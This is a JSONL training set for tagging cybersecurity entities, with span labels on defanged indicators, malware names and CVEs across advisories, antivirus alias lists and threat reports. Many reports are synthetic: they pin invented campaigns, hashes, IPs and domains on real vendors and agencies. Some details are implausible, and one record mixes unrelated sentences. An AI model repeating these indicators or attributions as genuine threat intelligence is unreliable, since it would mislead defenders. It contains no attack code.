{"text": "Forensic examination of the compromised host identified NjRAT artifacts. The primary payload was located at C:\\Windows\\System32\\config\\SAM with SHA256 hash 7a8cc24b994c7c318704dd8d3bbb571c714ac7eea8d5784c53b4b995c95073ea. A secondary implant was found at /dev/shm/.payload (MD5: 1bafa6cfe9b2fe395dd1ca0684cc9557). Network logs showed outbound connections to 141 [ . ] 177 [ . ] 122 [ . ] 166 and DNS queries to ransom-pay[[ . ]]icu.", "spans": {"Malware: NjRAT": [[56, 61]], "Indicator: 7a8cc24b994c7c318704dd8d3bbb571c714ac7eea8d5784c53b4b995c95073ea": [[156, 220]], "Indicator: 1bafa6cfe9b2fe395dd1ca0684cc9557": [[279, 311]], "Indicator: 141.177.122.166": [[358, 391]], "Indicator: ransom-pay[.]icu": [[411, 431]]}, "info": {"id": "synth_00096", "source": "defanged_augment"}}
{"text": "Blog Post by Microsoft MSRC: Tracking Scattered Spider's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2021-20463 against Zyxel USG deployments. The initial access vector involves spear-phishing emails from notification@identity-verify[ . ]cc delivering DanaBot. Post-compromise, the attackers deploy Meduza Stealer and use SharpHound for reconnaissance. C2 infrastructure includes 222 [ . ] 254 [ . ] 7 [ . ] 136 and gatewayrelay[ . ]tech. A staging server at hxxp://update-mail[.]live/assets/js/payload.js hosts additional tooling. Key artifact: /dev/shm/update.dll (SHA256: 615657959884cd350ee3b767ed1cbcced1ce83b64d7ac74c788d8ecbd2f278b4).", "spans": {"Organization: Microsoft MSRC": [[13, 27]], "Vulnerability: CVE-2021-20463": [[134, 148]], "System: Zyxel USG": [[157, 166]], "Indicator: notification@identity-verify.cc": [[242, 277]], "Malware: DanaBot": [[289, 296]], "Malware: Meduza Stealer": [[336, 350]], "Indicator: 222.254.7.136": [[417, 448]], "Indicator: gatewayrelay.tech": [[453, 474]], "Indicator: http://update-mail.live/assets/js/payload.js": [[496, 542]], "Indicator: 615657959884cd350ee3b767ed1cbcced1ce83b64d7ac74c788d8ecbd2f278b4": [[612, 676]]}, "info": {"id": "synth_v2_01617", "source": "defanged_augment"}}
{"text": "Description:\n\nVMware AVI Load Balancer contains an authenticated blind SQL Injection vulnerability. VMware has evaluated the severity of the issue to be in the  Moderate severity range hxxps://www[ . ]broadcom[ . ]com/support/vmware-services/security-response  with a maximum CVSSv3 base score of  6.8 hxxps://www[.]first[.]org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N .\n\nKnown Attack Vectors:\n\nAn authenticated malicious user with network access may be able to use specially crafted SQL queries to gain database access.\n\nResolution:\n\nTo remediate CVE-2025-41233 apply the patches to the Avi Controller listed in the 'Fixed Version' column of the 'Response Matrix' found below.\n\nWorkarounds:\n\nNone.\n\nAdditional Documentation:\n\nNone.\n\nAcknowledgements:\n\nVMware would like to thank  Alexandru Copaceanu hxxps://www[ . ]linkedin[ . ]com/in/alexandru-copaceanu-b39aaa1a8/  for reporting this issue to us.\n\nNotes:\n\nNone.\n\n \n\nResponse Matrix:\n\nProductVersionRunning OnCVECVSSv4SeverityFixed VersionWorkaroundsAdditional DocumentsVMware Avi Load Balancer30.1.1AnyCVE-2025-41233 6.8 hxxps://www[.]first[.]org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N Moderate 30.1.2-2p3 hxxps://techdocs[.]broadcom[.]com/us/en/vmware-security-load-balancing/avi-load-balancer/avi-load-balancer/30-1/vmware-avi-load-balancer-release-notes/release-notes-30-1-2.html NoneNoneVMware Avi Load Balancer30.1.2AnyCVE-2025-41233 6.8 hxxps://www[.]first[.]org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N Moderate 30.1.2-2p3 hxxps://techdocs[.]broadcom[.]com/us/en/vmware-security-load-balancing/avi-load-balancer/avi-load-balancer/30-1/vmware-avi-load-balancer-release-notes/release-notes-30-1-2.html NoneNoneVMware Avi Load Balancer30.2.1AnyCVE-2025-41233 6.8 hxxps://www[.]first[.]org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N Moderate 30.2.1-2p6 hxxps://techdocs[ . ]broadcom[ . ]com/us/en/vmware-security-load-balancing/avi-load-balancer/avi-load-balancer/30-2/vmware-avi-load-balancer-release-notes/release-notes-for-avi-load-balancer-version-30-2-1.html NoneNoneVMware Avi Load Balancer30.2.2AnyCVE-2025-41233 6.8 hxxps://www[ . ]first[ . ]org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N Moderate 30.2.2-2p5 hxxps://techdocs[ . ]broadcom[ . ]com/us/en/vmware-security-load-balancing/avi-load-balancer/avi-load-balancer/30-2/vmware-avi-load-balancer-release-notes/release-notes-for-avi-load-balancer-version-30-2-2.html NoneNoneVMware Avi Load Balancer30.2.3AnyCVE-2025-41233N/AN/AUnaffectedNoneNoneVMware Avi Load Balancer31.1.1AnyCVE-2025-41233 6.8 hxxps://www[ . ]first[ . ]org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N Moderate 31.1.1-2p2 hxxps://techdocs[ . ]broadcom[ . ]com/us/en/vmware-security-load-balancing/avi-load-balancer/avi-load-balancer/31-1/vmware-avi-load-balancer-release-notes/Release-Note-Section-20627.html NoneNone\n\nCWE-89 in the Avi Load Balancer component of VMware allows an authenticated attacker to execute blind SQL injections in versions 30.1.1, 30.1.2, 30.2.1, and 30.2.2 due to improper input validation, enabling unauthorized database access.", "spans": {"Vulnerability: CVE-2025-41233": [[572, 586], [1080, 1094], [1428, 1442], [1776, 1790], [2158, 2172], [2544, 2558], [2615, 2629]], "Indicator: https://www.broadcom.com/support/vmware-services/security-response": [[185, 259]], "Indicator: https://www.first.org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N": [[302, 392], [1099, 1189], [1447, 1537], [1795, 1885], [2177, 2271], [2634, 2728]], "Indicator: https://www.linkedin.com/in/alexandru-copaceanu-b39aaa1a8/": [[825, 891]], "Indicator: https://techdocs.broadcom.com/us/en/vmware-security-load-balancing/avi-load-balancer/avi-load-balancer/30-1/vmware-avi-load-balancer-release-notes/release-notes-30-1-2.html": [[1210, 1386], [1558, 1734]], "Indicator: https://techdocs.broadcom.com/us/en/vmware-security-load-balancing/avi-load-balancer/avi-load-balancer/30-2/vmware-avi-load-balancer-release-notes/release-notes-for-avi-load-balancer-version-30-2-1.html": [[1906, 2116]], "Indicator: https://techdocs.broadcom.com/us/en/vmware-security-load-balancing/avi-load-balancer/avi-load-balancer/30-2/vmware-avi-load-balancer-release-notes/release-notes-for-avi-load-balancer-version-30-2-2.html": [[2292, 2502]], "Indicator: https://techdocs.broadcom.com/us/en/vmware-security-load-balancing/avi-load-balancer/avi-load-balancer/31-1/vmware-avi-load-balancer-release-notes/Release-Note-Section-20627.html": [[2749, 2935]], "Organization: VMware": [[14, 20], [100, 106], [777, 783], [2991, 2997]], "Vulnerability: improper input validation": [[3117, 3142]], "Vulnerability: SQL Injection": [[71, 84]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-41233"}}
{"text": "A backdoor also known as: W32.HfsAutoB.186B Worm.Dorkbot.A Backdoor.W32.Padodor.kZnr Trojan/Spy.qukart Win32.Trojan-Spy.Quart.a Backdoor.Berbew!g1 Win32/Webber.W Win32.Qukart BKDR_BERBEW.SMA Win.Trojan.Crypted-36 Trojan-Proxy.Win32.Qukart.vjh Trojan.Win32.Qukart.etuxeg Worm.Win32.Qukart.K BackDoor.HangUp.43784 BKDR_BERBEW.SMA BehavesLike[ . ]Win32[ . ]Backdoor[ . ]cc Trojan.Win32.Senta TrojanProxy.Qukart.tsk Trojan-Proxy.Win32.Qukart.vjh Win-Trojan/Berbew.51712 TrojanProxy.Qukart Trojan-Ransom.Win32.Pornoasset.a", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Backdoor.cc": [[328, 369]]}, "info": {"id": "cyner2_train_000262", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\naf_unix: Get user_ns from in_skb in unix_diag_get_exact().\n\nWei Chen reported a NULL deref in sk_user_ns() [0][1], and Paolo diagnosed\nthe root cause: in unix_diag_get_exact(), the newly allocated skb does not\nhave sk. [2]\n\nWe must get the user_ns from the NETLINK_CB(in_skb).sk and pass it to\nsk_diag_fill().\n\n[0]:\nBUG: kernel NULL pointer dereference, address: 0000000000000270\n#PF: supervisor read access in kernel mode\n#PF: error_code(0x0000) - not-present page\nPGD 12bbce067 P4D 12bbce067 PUD 12bc40067 PMD 0\nOops: 0000 [#1] PREEMPT SMP\nCPU: 0 PID: 27942 Comm: syz-executor.0 Not tainted 6.1.0-rc5-next-20221118 #2\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS\nrel-1[ . ]13[ . ]0-48-gd9c812dda519-prebuilt[ . ]qemu[ . ]org 04/01/2014\nRIP: 0010:sk_user_ns include/net/sock.h:920 [inline]\nRIP: 0010:sk_diag_dump_uid net/unix/diag.c:119 [inline]\nRIP: 0010:sk_diag_fill+0x77d/0x890 net/unix/diag.c:170\nCode: 89 ef e8 66 d4 2d fd c7 44 24 40 00 00 00 00 49 8d 7c 24 18 e8\n54 d7 2d fd 49 8b 5c 24 18 48 8d bb 70 02 00 00 e8 43 d7 2d fd <48> 8b\n9b 70 02 00 00 48 8d 7b 10 e8 33 d7 2d fd 48 8b 5b 10 48 8d\nRSP: 0018:ffffc90000d67968 EFLAGS: 00010246\nRAX: ffff88812badaa48 RBX: 0000000000000000 RCX: ffffffff840d481d\nRDX: 0000000000000465 RSI: 0000000000000000 RDI: 0000000000000270\nRBP: ffffc90000d679a8 R08: 0000000000000277 R09: 0000000000000000\nR10: 0001ffffffffffff R11: 0001c90000d679a8 R12: ffff88812ac03800\nR13: ffff88812c87c400 R14: ffff88812ae42210 R15: ffff888103026940\nFS:  00007f08b4e6f700(0000) GS:ffff88813bc00000(0000) knlGS:0000000000000000\nCS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000270 CR3: 000000012c58b000 CR4: 00000000003506f0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n <TASK>\n unix_diag_get_exact net/unix/diag.c:285 [inline]\n unix_diag_handler_dump+0x3f9/0x500 net/unix/diag.c:317\n __sock_diag_cmd net/core/sock_diag.c:235 [inline]\n sock_diag_rcv_msg+0x237/0x250 net/core/sock_diag.c:266\n netlink_rcv_skb+0x13e/0x250 net/netlink/af_netlink.c:2564\n sock_diag_rcv+0x24/0x40 net/core/sock_diag.c:277\n netlink_unicast_kernel net/netlink/af_netlink.c:1330 [inline]\n netlink_unicast+0x5e9/0x6b0 net/netlink/af_netlink.c:1356\n netlink_sendmsg+0x739/0x860 net/netlink/af_netlink.c:1932\n sock_sendmsg_nosec net/socket.c:714 [inline]\n sock_sendmsg net/socket.c:734 [inline]\n ____sys_sendmsg+0x38f/0x500 net/socket.c:2476\n ___sys_sendmsg net/socket.c:2530 [inline]\n __sys_sendmsg+0x197/0x230 net/socket.c:2559\n __do_sys_sendmsg net/socket.c:2568 [inline]\n __se_sys_sendmsg net/socket.c:2566 [inline]\n __x64_sys_sendmsg+0x42/0x50 net/socket.c:2566\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x2b/0x70 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\nRIP: 0033:0x4697f9\nCode: f7 d8 64 89 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 48 89 f8 48\n89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d\n01 f0 ff ff 73 01 c3 48 c7 c1 bc ff ff ff f7 d8 64 89 01 48\nRSP: 002b:00007f08b4e6ec48 EFLAGS: 00000246 ORIG_RAX: 000000000000002e\nRAX: ffffffffffffffda RBX: 000000000077bf80 RCX: 00000000004697f9\nRDX: 0000000000000000 RSI: 00000000200001c0 RDI: 0000000000000003\nRBP: 00000000004d29e9 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000246 R12: 000000000077bf80\nR13: 0000000000000000 R14: 000000000077bf80 R15: 00007ffdb36bc6c0\n </TASK>\nModules linked in:\nCR2: 0000000000000270\n\n[1]: hxxps://lore[.]kernel[.]org/netdev/CAO4mrfdvyjFpokhNsiwZiP-wpdSD0AStcJwfKcKQdAALQ9_2Qw@mail.gmail.com/\n[2]: hxxps://lore[.]kernel[.]org/netdev/e04315e7c90d9a75613f3993c2baf2d344eef7eb.camel@redhat.com/", "spans": {"Indicator: https://lore.kernel.org/netdev/CAO4mrfdvyjFpokhNsiwZiP-wpdSD0AStcJwfKcKQdAALQ9_2Qw@mail.gmail.com/": [[3588, 3690]], "Indicator: https://lore.kernel.org/netdev/e04315e7c90d9a75613f3993c2baf2d344eef7eb.camel@redhat.com/": [[3696, 3789]], "Indicator: rel-1.13.0-48-gd9c812dda519-prebuilt.qemu.org": [[749, 810]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[704, 708]], "Vulnerability: NULL pointer dereference": [[397, 421]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-48970"}}
{"text": "A backdoor also known as: Trojan.VBKrypt Spyware.Pony Downloader.Ponik TSPY_HPFAREIT.SMB Trojan.Win32.VBKrypt.ymio Trojan.Win32.VBKrypt.evkxoj Trojan.VBKrypt.Win32.291698 BehavesLike[ . ]Win32[ . ]Fareit[ . ]ch Trojan.VBKrypt.cgbs TR/Dropper.VB.ocnhj Trojan.Win32.VBKrypt.ymio Trojan/Win32.VBKrypt.R213345 Trojan.VBKrypt Trj/GdSda.A Win32.Trojan.Vbkrypt.Amwf Trojan.VBKrypt!wORN5qK9fN4 Trojan.VB.Crypt W32/FareitVB.BEOK!tr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Fareit.ch": [[171, 210]]}, "info": {"id": "cyner2_train_005192", "source": "defanged_augment"}}
{"text": "A backdoor also known as: W32.HackerAu3.Worm Win32.Worm.Autoit.Q Backdoor.Win32.Shark.axz!O Worm.Autoit.i Win32.Worm.Autoit.Q Worm.AutoIt.Win32.2 W32/AutoRun.fjx WORM_UTOTI.RC Win32[ . ]Worm[ . ]Sohanad[ . ]br W32/Downloader.AEEC-3989 W32.SillyDC Win32/Vishawon.A WORM_UTOTI.RC Worm.Win32.AutoIt.i Win32.Worm.Autoit.Q Trojan.Script.AutoIt.delira Worm.Win32.Autorun.215552.B Win32.Virus.Alman.Svhc Win32.Worm.Autoit.Q Worm.Win32.AutoIt.~MT Win32.HLLW.Autoruner.1483 W32/Downldr2.AICJ Worm/AutoRun.jsl W32/Almanahe.C Win32.Worm.Autoit.Q W32.W.AutoRun.lbrr Worm.Win32.AutoIt.i Win32.Worm.Autoit.Q Trojan/Win32.AutoRun.C97057 Worm.AutoRun.FLD I-Worm.Autoit.AC Win32/Autoit.BA Worm.AutoIT.V Worm.Win32.AutoIt W32/AutoIt.I!worm Win32/Worm.c3b", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Win32.Worm.Sohanad.br": [[176, 209]]}, "info": {"id": "cyner2_train_006442", "source": "defanged_augment"}}
{"text": "A stored cross-site scripting (XSS) issue in Envira Gallery Lite before 1[.]8[.]3[.]3 allows remote attackers to inject arbitrary JavaScript/HTML code via a POST /wp-admin/admin-ajax.php request with the meta[title] parameter.", "spans": {"Indicator: 1.8.3.3": [[72, 85]], "Vulnerability: cross-site scripting": [[9, 29]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-35581"}}
{"text": "IOC Bulletin - StealC Campaign:\nNetwork Indicators:\n- 10 [ . ] 29 [ . ] 133 [ . ] 205\n- 192[.]51[.]237[.]114\n- 172 [ . ] 206 [ . ] 82 [ . ] 73\n- updatebackup[ . ]live\n- auth-cloud[.]com\nURLs:\n- hxxp://backupdata[.]org/api/v2/auth\n- hxxps://mailportal[ . ]live/api/v2/auth\nEmail Senders:\n- account@secure-verify[ . ]net\n- security@credential-check[ . ]site\nFile Indicators:\n- SHA256: 2cd488bb63a988ae9c8c029834e01204e97499b657da48bc01dd61a44aab7683\n- SHA1: 0fdaa964028c5ef9893258ca8e6687d66245a61b\n- Drop path: /etc/cron.d/implant.so", "spans": {"Malware: StealC": [[15, 21]], "Indicator: 10.29.133.205": [[54, 85]], "Indicator: 192.51.237.114": [[88, 108]], "Indicator: 172.206.82.73": [[111, 142]], "Indicator: updatebackup.live": [[145, 166]], "Indicator: auth-cloud.com": [[169, 185]], "Indicator: hxxp://backupdata.org/api/v2/auth": [[194, 229]], "Indicator: https://mailportal.live/api/v2/auth": [[232, 271]], "Indicator: account@secure-verify.net": [[289, 318]], "Indicator: security@credential-check.site": [[321, 355]], "Indicator: 2cd488bb63a988ae9c8c029834e01204e97499b657da48bc01dd61a44aab7683": [[383, 447]], "Indicator: 0fdaa964028c5ef9893258ca8e6687d66245a61b": [[456, 496]]}, "info": {"id": "synth_v2_01399", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Dragos identified a large-scale phishing operation. Emails originated from noreply@urgent-notice[.]online and admin@secure-verify[ . ]net, spoofing legitimate services. Victims were directed to hxxps://backup-auth[ . ]cc/assets/js/payload.js which hosted a credential harvesting page on sync-backup[ . ]online. A secondary link hxxps://databackup[ . ]net/download/update.exe delivered Latrodectus (MD5: 0f175b09deb346d508073b6526611520). The malware was saved to /home/user/.config/payload.bin and established C2 with 10 [ . ] 43 [ . ] 114 [ . ] 6.", "spans": {"Organization: Dragos": [[26, 32]], "Indicator: noreply@urgent-notice.online": [[101, 131]], "Indicator: admin@secure-verify.net": [[136, 163]], "Indicator: https://backup-auth.cc/assets/js/payload.js": [[220, 267]], "Indicator: sync-backup.online": [[313, 335]], "Indicator: https://databackup.net/download/update.exe": [[354, 400]], "Malware: Latrodectus": [[411, 422]], "Indicator: 0f175b09deb346d508073b6526611520": [[429, 461]], "Indicator: 10.43.114.6": [[544, 573]]}, "info": {"id": "synth_v2_01061", "source": "defanged_augment"}}
{"text": "Cargo is a package manager for the rust programming language. After a package is downloaded, Cargo extracts its source code in the ~/.cargo folder on disk, making it available to the Rust projects it builds. To record when an extraction is successful, Cargo writes \"ok\" to the .cargo-ok file at the root of the extracted source code once it extracted all the files. It was discovered that Cargo allowed packages to contain a .cargo-ok symbolic link, which Cargo would extract. Then, when Cargo attempted to write \"ok\" into .cargo-ok, it would actually replace the first two bytes of the file the symlink pointed to with ok. This would allow an attacker to corrupt one file on the machine using Cargo to extract the package. Note that by design Cargo allows code execution at build time, due to build scripts and procedural macros. The vulnerabilities in this advisory allow performing a subset of the possible damage in a harder to track down way. Your dependencies must still be trusted if you want to be protected from attacks, as it's possible to perform the same attacks with build scripts and procedural macros. The vulnerability is present in all versions of Cargo. Rust 1.64, to be released on September 22nd, will include a fix for it. Since the vulnerability is just a more limited way to accomplish what a malicious build scripts or procedural macros can do, we decided not to publish Rust point releases backporting the security fix. Patch files are available for Rust 1.63.0 are available in the wg-security-response repository for people building their own toolchain.\nMitigations We recommend users of alternate registries to exercise care in which package they download, by only including trusted dependencies in their projects. Please note that even with these vulnerabilities fixed, by design Cargo allows arbitrary code execution at build time thanks to build scripts and procedural macros: a malicious dependency will be able to cause damage regardless of these vulnerabilities. crates[.]io implemented server-side checks to reject these kinds of packages years ago, and there are no packages on crates[.]io exploiting these vulnerabilities. crates[.]io users still need to exercise care in choosing their dependencies though, as remote code execution is allowed by design there as well.", "spans": {"Indicator: crates.io": [[1997, 2008], [2114, 2125], [2160, 2171]], "Vulnerability: remote code execution": [[2248, 2269]], "Vulnerability: code execution": [[757, 771], [1832, 1846]], "Vulnerability: symlink": [[596, 603]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-36113"}}
{"text": "Phishing Campaign Report: CISA identified a large-scale phishing operation. Emails originated from alert@urgent-notice[ . ]online and ceo@credential-check[ . ]site, spoofing legitimate services. Victims were directed to hxxps://staticapi[ . ]online/login which hosted a credential harvesting page on staticapi[ . ]info. A secondary link hxxps://cdnnode[ . ]live/secure/token delivered PlugX (MD5: 6614f59fa687faa7ddd8cf4afbf1e59b). The malware was saved to /usr/local/bin/beacon.dll and established C2 with 172[.]109[.]182[.]198.", "spans": {"Organization: CISA": [[26, 30]], "Indicator: alert@urgent-notice.online": [[99, 129]], "Indicator: ceo@credential-check.site": [[134, 163]], "Indicator: hxxps://staticapi.online/login": [[220, 254]], "Indicator: staticapi.info": [[300, 318]], "Indicator: hxxps://cdnnode.live/secure/token": [[337, 374]], "Malware: PlugX": [[385, 390]], "Indicator: 6614f59fa687faa7ddd8cf4afbf1e59b": [[397, 429]], "Indicator: 172.109.182.198": [[507, 528]]}, "info": {"id": "synth_v2_00885", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Proofpoint identified a large-scale phishing operation. Emails originated from verify@account-update[.]xyz and helpdesk@mail-service[ . ]info, spoofing legitimate services. Victims were directed to hxxp://gatewaystorage[.]link/panel/index.html which hosted a credential harvesting page on backupedge[ . ]tech. A secondary link hxxps://cachesync[ . ]online/download/update.exe delivered Play (SHA256: 65d18eb1c2f37aff3af81ac0355b74658e21a7362383bed1532995d3f68fe96f). The malware was saved to C:\\Program Files\\Common Files\\dropper.ps1 and established C2 with 172 [ . ] 239 [ . ] 88 [ . ] 51.", "spans": {"Organization: Proofpoint": [[26, 36]], "Indicator: verify@account-update.xyz": [[105, 132]], "Indicator: helpdesk@mail-service.info": [[137, 167]], "Indicator: hxxp://gatewaystorage.link/panel/index.html": [[224, 269]], "Indicator: backupedge.tech": [[315, 334]], "Indicator: hxxps://cachesync.online/download/update.exe": [[353, 401]], "Malware: Play": [[412, 416]], "Indicator: 65d18eb1c2f37aff3af81ac0355b74658e21a7362383bed1532995d3f68fe96f": [[426, 490]], "Indicator: 172.239.88.51": [[584, 615]]}, "info": {"id": "synth_v2_00961", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: WarmCookie (MD5: 8e7d05464f9b5f901edcc20575df2b85). Upon execution on Windows 11, the sample creates C:\\Program Files\\Common Files\\sam.hive and injects into legitimate processes. Network analysis shows beaconing to 134[.]39[.]77[.]45 every 60 seconds and DNS queries to nodestatic[.]link. The second stage was fetched from hxxps://storage-portal[.]online/panel/index.html and written to C:\\Windows\\Temp\\update.dll. The payload uses ADFind-style techniques for defense evasion. A secondary hash (MD5: 3aaa1ea6f7b163c41ed0dd810307d601) was extracted from the unpacked payload.", "spans": {"Malware: WarmCookie": [[25, 35]], "Indicator: 8e7d05464f9b5f901edcc20575df2b85": [[42, 74]], "System: Windows 11": [[95, 105]], "Indicator: 134.39.77.45": [[240, 258]], "Indicator: nodestatic.link": [[295, 312]], "Indicator: hxxps://storage-portal.online/panel/index.html": [[348, 396]], "Indicator: 3aaa1ea6f7b163c41ed0dd810307d601": [[525, 557]]}, "info": {"id": "synth_v2_00648", "source": "defanged_augment"}}
{"text": "Deserialization of Untrusted Data, Improper Input Validation vulnerability in Apache UIMA Java SDK, Apache UIMA Java SDK, Apache UIMA Java SDK, Apache UIMA Java SDK.This issue affects Apache UIMA Java SDK: before 3.5.0.\n\nUsers are recommended to upgrade to version 3.5.0, which fixes the issue.\n\nThere are several locations in the code where serialized Java objects are deserialized without verifying the data. This affects in particular:\n  *  the deserialization of a Java-serialized CAS, but also other binary CAS formats that include TSI information using the CasIOUtils class;\n  *  the CAS Editor Eclipse plugin which uses the the CasIOUtils class to load data;\n  *  the deserialization of a Java-serialized CAS of the Vinci Analysis Engine service which can receive using Java-serialized CAS objects over network connections;\n  *  the CasAnnotationViewerApplet and the CasTreeViewerApplet;\n  *  the checkpointing feature of the CPE module.\n\nNote that the UIMA framework by default does not start any remotely accessible services (i.e. Vinci) that would be vulnerable to this issue. A user or developer would need to make an active choice to start such a service. However, users or developers may use the CasIOUtils in their own applications and services to parse serialized CAS data. They are affected by this issue unless they ensure that the data passed to CasIOUtils is not a serialized Java object.\n\nWhen using Vinci or using CasIOUtils in own services/applications, the unrestricted deserialization of Java-serialized CAS files may allow arbitrary (remote) code execution.\n\nAs a remedy, it is possible to set up a global or context-specific ObjectInputFilter (cf.  hxxps://openjdk[ . ]org/jeps/290  and  hxxps://openjdk[ . ]org/jeps/415 ) if running UIMA on a Java version that supports it. \n\nNote that Java 1.8 does not support the ObjectInputFilter, so there is no remedy when running on this out-of-support platform. An upgrade to a recent Java version is strongly recommended if you need to secure an UIMA version that is affected by this issue.\n\nTo mitigate the issue on a Java 9+ platform, you can configure a filter pattern through the \"jdk.serialFilter\" system property using a semicolon as a separator:\n\nTo allow deserializing Java-serialized binary CASes, add the classes:\n  *  org.apache.uima.cas.impl.CASCompleteSerializer\n  *  org.apache.uima.cas.impl.CASMgrSerializer\n  *  org.apache.uima.cas.impl.CASSerializer\n  *  java.lang.String\n\nTo allow deserializing CPE Checkpoint data, add the following classes (and any custom classes your application uses to store its checkpoints):\n  *  org.apache.uima.collection.impl.cpm.CheckpointData\n  *  org.apache.uima.util.ProcessTrace\n  *  org.apache.uima.util.impl.ProcessTrace_impl\n  *  org.apache.uima.collection.base_cpm.SynchPoint\n\nMake sure to use \"!*\" as the final component to the filter pattern to disallow deserialization of any classes not listed in the pattern.\n\nApache UIMA 3.5.0 uses tightly scoped ObjectInputFilters when reading Java-serialized data depending on the type of data being expected. Configuring a global filter is not necessary with this version.", "spans": {"Indicator: https://openjdk.org/jeps/290": [[1675, 1707]], "Indicator: https://openjdk.org/jeps/415": [[1714, 1746]], "System: Java": [[90, 94], [112, 116], [134, 138], [156, 160], [196, 200], [353, 357], [469, 473], [696, 700], [777, 781], [1395, 1399], [1512, 1516], [1770, 1774], [1813, 1817], [1953, 1957], [2088, 2092], [2246, 2250], [3007, 3011]], "Organization: Eclipse": [[601, 608]], "System: Apache": [[78, 84], [100, 106], [122, 128], [144, 150], [184, 190], [2937, 2943]], "Vulnerability: Improper Input Validation": [[35, 60]], "Vulnerability: Deserialization": [[0, 15]], "Vulnerability: deserialization": [[448, 463], [675, 690], [1493, 1508], [2878, 2893]], "Vulnerability: code execution": [[1567, 1581]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-39913"}}
{"text": "com.bbt.cmol com.sovereign.santander com.mtb.mbanking.sc.retail.prod com.fi9293.godough com.commbank.netbank org.westpac.bank org.stgeorge.bank au.com.nab.mobile au.com.bankwest.mobile au.com.ingdirect.android org.banksa.bank com.anz.android com.anz.android.gomoney com[.]citibank[.]mobile[.]au org.bom.bank com.latuabancaperandroid In addition to stealing keystrokes , Naikon also intercepted network traffic . Rancor : 199[.]247[.]6[.]253 . Note : The default log rotation configuration on NetScaler allows 25 files per log type ( e.g. , ns.log ) and 100 Kilobytes per log , therefore recording 2.5 megabytes in total .", "spans": {"Indicator: 199.247.6.253": [[421, 440]], "Indicator: com.citibank.mobile.au": [[266, 294]]}, "info": {"id": "cyberner_stix_train_005437", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Trojan.Killav Downloader.Betload.Win32.51 Win32.Trojan.WisdomEyes.16070401.9500.9783 Trojan[.]Win32[.]KillAV[.]me Troj.W32.SchoolGirl.tnx1 Trojan.Win32.Killav BehavesLike.Win32.Downloader.lh Trojan[.]Win32[.]KillAV[.]me Trojan.Win32.Killav BAT/KillAV.NCO Win32.Trojan.Killav.Pgwh PUA.Bat.Hoax W32/KillAV[.]ME!tr Win32/Trojan.ba9", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Trojan.Win32.KillAV.me": [[111, 139], [217, 245]], "Indicator: KillAV.ME": [[323, 334]]}, "info": {"id": "cyner2_train_006006", "source": "defanged_augment"}}
{"text": "According to SpiderLabs, in May 2015 the \"company\" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax[.]com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT).", "spans": {"Indicator: qarallax.com": [[217, 231]], "Malware: Qarallax RAT": [[182, 194], [376, 388]], "System: Java": [[275, 279]], "Malware: Quaverse RAT": [[83, 95]]}, "info": {"source": "defanged_augment", "name": "Qarallax RAT"}}
{"text": "Phishing Campaign Report: Rapid7 identified a large-scale phishing operation. Emails originated from billing@login-portal[.]tech and security@document-share[.]link, spoofing legitimate services. Victims were directed to hxxps://mailauth[ . ]tech/download/update.exe which hosted a credential harvesting page on cdnnode[.]tech. A secondary link hxxps://relayedge[ . ]top/callback delivered BatLoader (MD5: 7ba3bfb6e2a77aaa1f02ffaa51991d9a). The malware was saved to /tmp/dropper.ps1 and established C2 with 172[.]223[.]244[.]35.", "spans": {"Organization: Rapid7": [[26, 32]], "Indicator: billing@login-portal.tech": [[101, 128]], "Indicator: security@document-share.link": [[133, 163]], "Indicator: hxxps://mailauth.tech/download/update.exe": [[220, 265]], "Indicator: cdnnode.tech": [[311, 325]], "Indicator: https://relayedge.top/callback": [[344, 378]], "Malware: BatLoader": [[389, 398]], "Indicator: 7ba3bfb6e2a77aaa1f02ffaa51991d9a": [[405, 437]], "Indicator: 172.223.244.35": [[506, 526]]}, "info": {"id": "synth_v2_00953", "source": "defanged_augment"}}
